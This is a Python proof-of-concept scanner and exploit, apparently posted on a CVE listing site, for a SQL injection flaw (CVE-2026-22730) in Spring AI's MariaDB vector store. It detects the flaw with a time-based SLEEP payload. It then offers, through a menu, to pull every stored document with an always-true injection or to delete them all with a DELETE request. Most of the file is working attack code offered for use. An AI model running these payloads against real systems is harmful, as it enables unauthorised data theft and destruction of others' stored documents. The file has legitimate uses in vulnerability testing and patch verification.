5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2026-22730_scanner.py PY
#!/usr/bin/env python3

# Startup banner. This runs at module import time, before the imports below,
# so it is printed even when the file is imported rather than run as a script.
print("""

███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝
            CVE-2026-22730 Scanner & Exploit
  SQL Injection in Spring AI's MariaDB Vector Store
  Supports GET (query parameter) and POST (JSON body) with placeholder.
            NULL200OK 💀🔥created by NABEEL 🔥💀


""")

import requests
import time
import json
import sys
import argparse
from datetime import datetime
from urllib.parse import urlencode, quote_plus

# ---------------------------
#  Configuration
# ---------------------------
DEFAULT_SLEEP = 5        # default for --sleep: seconds used in the time-based detection payload
TIMEOUT = 10             # timeout (seconds) passed to every requests call in send_request
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"  # User-Agent header sent with every request

# Placeholder substring in the JSON template; send_request replaces it with the
# injected value when building a JSON body (POST, and DELETE when a template is given)
PAYLOAD_MARKER = "__PAYLOAD__"

# ---------------------------
#  Helper Functions
# ---------------------------
def send_request(base_url, method, param_name, value, json_template=None):
    """
    Issue one HTTP request carrying ``value`` and time it.

    The value travels either as a single URL-encoded query parameter
    (GET, or DELETE without a template) or inside a JSON body produced by
    replacing PAYLOAD_MARKER in ``json_template`` (POST, or DELETE with a
    template). The method name is matched case-insensitively.

    Returns a ``(response, elapsed_seconds)`` tuple. On any failure handled
    here (unsupported method, missing or invalid template, a
    ``requests`` exception) a message is printed and ``(None, 0)`` is returned.
    """
    request_headers = {"User-Agent": USER_AGENT}
    verb = method.upper()

    def _timed(sender, target, **extra):
        # Shared wrapper: wall-clock the call and map transport errors to (None, 0).
        try:
            began = time.time()
            reply = sender(target, headers=request_headers, timeout=TIMEOUT, **extra)
            return reply, time.time() - began
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
            return None, 0

    def _via_query(sender):
        # Value goes into the query string as param_name=value.
        query = urlencode({param_name: value}, quote_via=quote_plus)
        return _timed(sender, base_url + "?" + query)

    def _via_json(sender):
        # Value is substituted into the template text, which must then parse as JSON.
        rendered = json_template.replace(PAYLOAD_MARKER, value)
        try:
            parsed = json.loads(rendered)
        except json.JSONDecodeError:
            print("[!] Invalid JSON template.")
            return None, 0
        request_headers["Content-Type"] = "application/json"
        return _timed(sender, base_url, json=parsed)

    if verb == "GET":
        return _via_query(requests.get)

    if verb == "POST":
        if not json_template:
            print("[!] POST method requires --json-template with placeholder.")
            return None, 0
        return _via_json(requests.post)

    if verb == "DELETE":
        # A template selects the JSON-body form; otherwise fall back to the query parameter.
        if json_template:
            return _via_json(requests.delete)
        return _via_query(requests.delete)

    print(f"[!] Unsupported method: {verb}")
    return None, 0

def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None):
    """
    Time-based detection: compare a normal request against a SLEEP payload.

    Sends one request with ``baseline_value`` and one with a payload asking
    the database to sleep for ``sleep_time`` seconds, then compares the two
    elapsed times returned by ``send_request``.

    Returns True when the payload request was slower than the baseline by at
    least the decision threshold, False otherwise. False is also returned,
    after printing a message, when ``sleep_time`` is not positive or when
    either request fails (``send_request`` returned no response).
    """
    # A zero or negative delay cannot produce a measurable difference, and
    # would make the comparison below succeed on ordinary jitter.
    if sleep_time <= 0:
        print("[!] Sleep time must be a positive number of seconds.")
        return False

    print("[*] Sending baseline request...")
    resp1, time1 = send_request(url, method, param, baseline_value, json_template)
    if resp1 is None:
        print("[!] Baseline request failed. Exiting.")
        return False

    # SQLi payload that tries to inject a SLEEP
    payload = f"' OR SLEEP({sleep_time}) --"
    print(f"[*] Sending time‑based payload: {payload}")
    resp2, time2 = send_request(url, method, param, payload, json_template)
    if resp2 is None:
        print("[!] Payload request failed. Exiting.")
        return False

    print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")
    # Allow 1s of network jitter, but never let the threshold drop below half
    # the requested delay: with sleep_time <= 1 a plain "sleep_time - 1" is
    # <= 0 and any response would be reported as vulnerable.
    threshold = max(sleep_time - 1, sleep_time / 2)
    if time2 - time1 >= threshold:
        print("[+] Target appears VULNERABLE to SQL injection!")
        return True

    print("[-] Target does NOT seem vulnerable.")
    return False

def exploit_retrieve_all(url, method, param, json_template=None):
    """
    Send the always-true condition payload through ``send_request``.

    Returns the response body text, or an empty string when the response
    object is falsy. That covers a failed request (None); a ``requests``
    response with an error status also evaluates as falsy.
    """
    injected = "' OR '1'='1"
    print(f"[*] Exploiting with payload (retrieve all): {injected}")
    reply, _elapsed = send_request(url, method, param, injected, json_template)
    return reply.text if reply else ""

def exploit_delete_all(url, method, param, json_template=None):
    """
    Send the always-true condition payload as an HTTP DELETE request.

    The ``method`` argument is accepted for signature parity with the other
    helpers but is not used: the request is always issued as DELETE.

    Returns the response body text, or an empty string when the response
    object is falsy. That covers a failed request (None); a ``requests``
    response with an error status also evaluates as falsy.
    """
    injected = "' OR '1'='1"
    print(f"[*] Exploiting with payload (DELETE all): {injected}")
    # The verb is fixed here regardless of what the caller passed as ``method``.
    reply, _elapsed = send_request(url, "DELETE", param, injected, json_template)
    return reply.text if reply else ""

def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None):
    """
    Save the scan outcome as JSON, TXT and HTML files in the current directory.

    All three files share the base name ``cve-2026-22730_<YYYYmmdd_HHMMSS>``
    and are written as UTF-8.

    Parameters:
        data: unused; kept so existing callers keep working.
        target_url: URL that was scanned.
        method: HTTP method used for the scan.
        vuln_status: result of the detection step.
        exploit_data: response text captured from the target, if any.
        exploit_type: label of the action performed, if any.

    Every value interpolated into the HTML report is HTML-escaped. The
    captured response text comes from the scanned server and must not be
    able to inject markup or script into the report.
    """
    import html  # local import: not provided by the file's import block

    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    base_filename = f"cve-2026-22730_{timestamp}"

    # Prepare data structure
    report = {
        "timestamp": timestamp,
        "target": target_url,
        "method": method,
        "vulnerable": vuln_status,
        "detection_method": "time-based SQL injection",
        "exploit_type": exploit_type,
        "exploit_result": exploit_data if exploit_data else None
    }

    # JSON
    with open(f"{base_filename}.json", "w", encoding="utf-8") as f:
        json.dump(report, f, indent=4)
    print(f"[+] JSON report saved: {base_filename}.json")

    # TXT (explicit UTF-8 so non-ASCII response text cannot fail under the locale encoding)
    with open(f"{base_filename}.txt", "w", encoding="utf-8") as f:
        f.write("CVE-2026-22730 Scan Report\n")
        f.write(f"Timestamp: {timestamp}\n")
        f.write(f"Target: {target_url}\n")
        f.write(f"Method: {method}\n")
        f.write(f"Vulnerable: {vuln_status}\n")
        if exploit_type:
            f.write(f"Exploit performed: {exploit_type}\n")
        if exploit_data:
            f.write("\n--- Exploitation Result ---\n")
            f.write(exploit_data)
    print(f"[+] TXT report saved: {base_filename}.txt")

    # HTML: escape everything that did not originate in this function
    safe_target = html.escape(str(target_url))
    safe_method = html.escape(str(method))
    safe_status = html.escape(str(vuln_status))
    safe_type = html.escape(str(exploit_type)) if exploit_type else "None"
    safe_result = html.escape(str(exploit_data)) if exploit_data else "No exploitation performed."
    status_class = "yes" if vuln_status else "no"

    html_content = f"""<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>CVE-2026-22730 Scan Report</title>
    <style>
        body {{ font-family: Arial, sans-serif; margin: 40px; }}
        h1 {{ color: #333; }}
        .vuln-yes {{ color: red; font-weight: bold; }}
        .vuln-no {{ color: green; }}
        pre {{ background: #f4f4f4; padding: 10px; border: 1px solid #ddd; }}
    </style>
</head>
<body>
    <h1>CVE-2026-22730 SQL Injection Scanner</h1>
    <p><strong>Timestamp:</strong> {timestamp}</p>
    <p><strong>Target URL:</strong> {safe_target}</p>
    <p><strong>HTTP Method:</strong> {safe_method}</p>
    <p><strong>Vulnerable:</strong> <span class="vuln-{status_class}">{safe_status}</span></p>
    <h2>Exploitation</h2>
    <p><strong>Type:</strong> {safe_type}</p>
    <pre>{safe_result}</pre>
</body>
</html>"""
    with open(f"{base_filename}.html", "w", encoding="utf-8") as f:
        f.write(html_content)
    print(f"[+] HTML report saved: {base_filename}.html")

# ---------------------------
#  Main
# ---------------------------
def main():
    """
    Command-line entry point.

    Parses the arguments, falling back to interactive prompts when --url is
    not given. It then validates the inputs, runs the time-based detection,
    and offers a follow-up menu if the target is reported vulnerable.
    Finally it writes the reports through ``save_results``.

    Exits with status 1 when required input is missing or invalid: no URL,
    no parameter name for GET, or no template / no placeholder for POST.
    """
    parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
    parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
    parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
    parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
    parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
    parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
    parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
    args = parser.parse_args()

    # Interactive mode if arguments missing
    if not args.url:
        print("=== CVE-2026-22730 Scanner ===\n")
        args.url = input("Enter target URL: ").strip()
        # Without a URL there is nothing to scan; stop before sending anything.
        if not args.url:
            print("[!] A target URL is required. Exiting.")
            sys.exit(1)
        args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
        if args.method not in ["GET", "POST"]:
            print("[!] Invalid method. Using GET.")
            args.method = "GET"

        if args.method == "GET":
            args.param = input("Enter query parameter name (e.g., department): ").strip()
            # Same requirement the command-line path enforces for GET.
            if not args.param:
                print("[!] GET method requires --param.")
                sys.exit(1)
        else:  # POST
            args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
            args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
            if PAYLOAD_MARKER not in args.json_template:
                print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
                sys.exit(1)

        baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
        if baseline_input:
            args.baseline = baseline_input
        sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
        if sleep_input:
            try:
                args.sleep = int(sleep_input)
            except ValueError:
                # args.sleep still holds the argparse default at this point.
                print("[!] Invalid number. Using default.")
    else:
        # Validate arguments
        if args.method == "POST" and not args.json_template:
            print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
            sys.exit(1)
        if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
            print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
            sys.exit(1)
        if args.method == "GET" and not args.param:
            print("[!] GET method requires --param.")
            sys.exit(1)

    # Remove trailing slash if present
    args.url = args.url.rstrip("/")

    print(f"\n[*] Targeting: {args.url} with method {args.method}")

    # Step 1: Detection
    vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)

    # Step 2: Optional follow-up, offered only when detection reported True
    exploit_data = None
    exploit_type = None
    if vuln:
        print("\n[?] Target is vulnerable. Choose exploitation option:")
        print("    1. Retrieve all documents (SELECT injection)")
        print("    2. Delete all documents (DELETE injection) - DESTRUCTIVE")
        print("    3. Skip exploitation")
        choice = input("Enter 1, 2, or 3: ").strip()
        if choice == '1':
            exploit_type = "RETRIEVE_ALL"
            exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
            if exploit_data:
                print("[+] Data retrieval completed.")
            else:
                print("[!] Exploit failed or returned no data.")
        elif choice == '2':
            # Destructive action: requires the literal word 'yes' before proceeding.
            print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
            confirm = input("Type 'yes' to confirm: ").strip().lower()
            if confirm == 'yes':
                exploit_type = "DELETE_ALL"
                exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
                if exploit_data:
                    print("[+] Delete request sent. Check response.")
                else:
                    print("[!] Delete exploit failed.")
            else:
                print("[*] Deletion cancelled.")
        else:
            # Any input other than '1' or '2' is treated as "skip".
            print("[*] Skipping exploitation.")

    # Step 3: Save results (the first argument is unused by save_results)
    save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)

if __name__ == "__main__":
    main()